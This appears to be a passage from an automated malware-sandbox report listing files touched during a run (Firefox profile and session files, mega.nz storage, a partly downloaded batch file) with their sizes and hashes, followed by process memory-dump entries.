SHA1
67af41889ccdcfb88ea5d1c29afda743ead57e1a

SHA256
ec12ba6effc55ab75dca2817b0254f28335b96efcf7e5cf7b33d2bcea9bb90dc

SHA512
9a77fa45af95f36943020ef6953df202dc6c41734faf625a91e8b54eeb7220da82c2cfbb70cfc53cc167466eaa947abb358908447157bbb03ba33048d91a9c6f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\prefs-1.js

Filesize
7KB

MD5
a13253eb91319b24f9f9cb0f913082f9

SHA1
4af98bb2fd1305d4ed9ef4db14041da01ec2a987

SHA256
3b95d4f87a1e4448f2057dcbb07f06a5b980357809c8d03a650ee294c2e4a1e7

SHA512
20d505d496cf2ba6b7e00c64a23c0042424189b42cfdee449cdc2940fa84aa396486c035b8f7d2d974e6e428c76990d244176ead2f3eb9a1e0c23049537ba4e3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
f50cce07ab47052681b4f9e40efc4673

SHA1
0384cc9b54a189e43f5de4d8512aea9d85497dc5

SHA256
b51595c5c1ba94b2d4b32ed4f16134899259dbec1f3fe5528f84f9b00374d302

SHA512
be44b0d3a8fd3d3c28501d44c684ef1097bec40de77e79502c4b83bea920620aa2f16bb4b5af2dd5779f17ba60f94648a920084004c11aae4dd514a406a68844

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
6KB

MD5
0286cdf5c6bc3e49e2899cf26c27f983

SHA1
b244b5addbad7395b0e970d3899847cf7ed4dd1c

SHA256
3a4dfefd57c2272379fbb60026ebb6e511755c3ede9f3a5712aa66489f5b528b

SHA512
ca0f2da3e861cde038b3c1bdf1407eab5084db2eac1600cb0ad8a12c99228e391b1a8aec7fd30cc20d123830a53eface4755301adfb030679fca225c5e1f01a0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
6KB

MD5
45483cdc455e7cc416a3e1e7675d7674

SHA1
2728070647108aee276b1d37ba57ace72761b57e

SHA256
4a18771c81876d97aa03728f0b1b4fdd68d24c5049278e31e06dd5c56d47f00a

SHA512
68998e0f260c4dc54f5081063779b492e6df411d1932faf40b9667617f9d23108a299fcc4718dd1fd1185ef548f352e17cdfc54aa2ecab6c60abb274647823c0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore.jsonlz4

Filesize
5KB

MD5
cdf7f4d4e87e40d01c3309721529c6c8

SHA1
146816ef787fb7352f2a1db91d04dff3bbba01e6

SHA256
acae2b8d9390382728978503aba9705674df9e48cf8bc8c615bfff9eea707c13

SHA512
eb669c99660f572cd0604b3941b3cea1554644e0924af779c9b421fa04e2847f8912dd06892ebdf14af18329d8a425687124ee7fdfebea761d7f67c81839d79a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\storage\default\https+++mega.nz\cache\morgue\61\{0befcd81-5c12-403b-af3e-3010592f423d}.final

Filesize
1KB

MD5
3efa9abd92666265dd81c4f4311a96f9

SHA1
41b6b716d67b93555e444cd453f3c6e3f8c9522c

SHA256
5066b1841e8877db31312ef3af86f9bc9234c95071119e025764f45241a4e2e7

SHA512
5961950f077501608a0f2975e7f69c483eeacc4eec4ac77fd650cc1131609501f87819f93ed23aa508a90426156abf038a859fac4112d2d4435bbb634027cd6c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\storage\default\https+++mega.nz\idb\3713173747_s_edmban.sqlite

Filesize
48KB

MD5
c8338d78cbe62aa2e1c1d004ee88b7da

SHA1
0f9f84f5091b5bb0066d46911e06202827c8e92d

SHA256
33a1a571325fb6ec5b7b7f5c0fa1778468d5b37ab77ba8321938ef8c28932bef

SHA512
1e4620c21bc462e1fdd14d6189a66b68e501c77c804bef0fe6b561ac16104c9b03b081c5f82136482908054b1ec462f2de1309778e901b8517e48fd76199636a

Download Submit
C:\Users\Admin\Downloads\1WvvOC-U.bat.part

Filesize
855KB

MD5
35e845a0ecf75d9a598d0b58aa1a0174

SHA1
231b7154e8acb666a8f592a48dc6f77f928e651b

SHA256
a20474d0697013205e1fdb47517df7faa2bcfa06c447955654754d232f4179b9

SHA512
070358c3d6f5274f787df142c3c5f07a4ab2b08f1676685f2e9bf56dad64314cc8b8deb44ae2318ca64773b97fb9b79456ab244e6d82b392593e35e6b639a01e

Download Submit
memory/1424-350-0x000002BB79CF0000-0x000002BB79CF8000-memory.dmp

Filesize
32KB

Download
memory/1424-352-0x000002BB79F80000-0x000002BB79FFC000-memory.dmp

Filesize
496KB

Download
memory/1424-345-0x000002BB79D00000-0x000002BB79D22000-memory.dmp

Filesize
136KB

Download
memory/1424-351-0x000002BB7A010000-0x000002BB7A0B2000-memory.dmp

Filesize
648KB

Download
memory/4468-396-0x0000000006F90000-0x0000000006F98000-memory.dmp

Filesize
32KB

Download
memory/4468-404-0x0000000007EF0000-0x0000000007FFA000-memory.dmp

Filesize
1.0MB

Download
memory/4468-363-0x00000000029F0000-0x0000000002A26000-memory.dmp

Filesize
216KB

Download
memory/4468-367-0x0000000005880000-0x00000000058E6000-memory.dmp

Filesize
408KB

Download
memory/4468-389-0x0000000005DF0000-0x0000000005E0E000-memory.dmp

Filesize
120KB

Download
memory/4468-390-0x0000000005E20000-0x0000000005E6C000-memory.dmp

Filesize
304KB

Download
memory/4468-365-0x0000000005030000-0x0000000005052000-memory.dmp

Filesize
136KB

Download
memory/4468-366-0x0000000005810000-0x0000000005876000-memory.dmp

Filesize
408KB

Download
memory/4468-409-0x00000000098F0000-0x0000000009E1C000-memory.dmp

Filesize
5.2MB

Download
memory/4468-394-0x00000000075A0000-0x0000000007C1A000-memory.dmp

Filesize
6.5MB

Download
memory/4468-395-0x0000000006F50000-0x0000000006F6A000-memory.dmp

Filesize
104KB

Download
memory/4468-364-0x0000000005130000-0x0000000005758000-memory.dmp

Filesize
6.2MB

Download
memory/4468-397-0x0000000007080000-0x000000000711C000-memory.dmp

Filesize
624KB

Download
memory/4468-398-0x00000000072C0000-0x00000000072E6000-memory.dmp

Filesize
152KB

Download
memory/4468-399-0x00000000072E0000-0x0000000007332000-memory.dmp

Filesize
328KB

Download
memory/4468-400-0x00000000081D0000-0x0000000008774000-memory.dmp

Filesize
5.6MB

Download
memory/4468-401-0x0000000007420000-0x00000000074B2000-memory.dmp

Filesize
584KB

Download
memory/4468-402-0x0000000004D60000-0x0000000004D6A000-memory.dmp

Filesize
40KB

Download
memory/4468-403-0x0000000008DA0000-0x00000000093B8000-memory.dmp

Filesize
6.1MB

Download
memory/4468-377-0x00000000058F0000-0x0000000005C44000-memory.dmp

Filesize
3.3MB

Download
memory/4468-405-0x0000000007530000-0x0000000007542000-memory.dmp

Filesize
72KB

Download
memory/4468-406-0x0000000007D10000-0x0000000007D4C000-memory.dmp

Filesize
240KB

Download
memory/4468-407-0x0000000007E90000-0x0000000007EE0000-memory.dmp

Filesize
320KB

Download
memory/4468-408-0x0000000008780000-0x0000000008942000-memory.dmp

Filesize
1.8MB

Download
memory/5240-393-0x000002215C820000-0x000002215C884000-memory.dmp

Filesize
400KB

Download
memory/5240-392-0x000002215C770000-0x000002215C7C4000-memory.dmp

Filesize
336KB

Download
memory/5240-391-0x0000022144310000-0x0000022144318000-memory.dmp

Filesize
32KB

Download